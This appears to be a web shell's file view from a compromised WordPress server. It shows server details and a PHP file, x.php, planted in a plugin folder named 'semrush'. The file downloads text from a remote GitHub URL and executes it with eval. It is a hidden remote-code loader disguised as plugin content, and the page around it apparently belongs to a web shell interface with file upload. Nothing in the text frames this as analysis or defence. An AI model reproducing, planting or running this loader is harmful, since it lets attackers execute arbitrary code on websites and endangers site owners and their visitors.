HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux sanjaymanandhar.com 6.8.0-78-generic #78-Ubuntu SMP PREEMPT_DYNAMIC Tue Aug 12 11:34:18 UTC 2025 x86_64
User: www-data (33)
PHP: 8.3.6
Disabled: NONE
Upload Files
File: /var/www/html/wp-content/plugins/semrush/x.php
<?php
$url = "https://raw.githubusercontent.com/apchelinux/debug/refs/heads/main/license.txt";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
$body = substr($response, $header_size);

if (curl_errno($ch)) {
    echo "cURL error: " . curl_error($ch);
} elseif ($http_code != 200) {
    echo "HTTP Error: $http_code";
} else {
    eval("?>" . $body);
}

curl_close($ch);
?>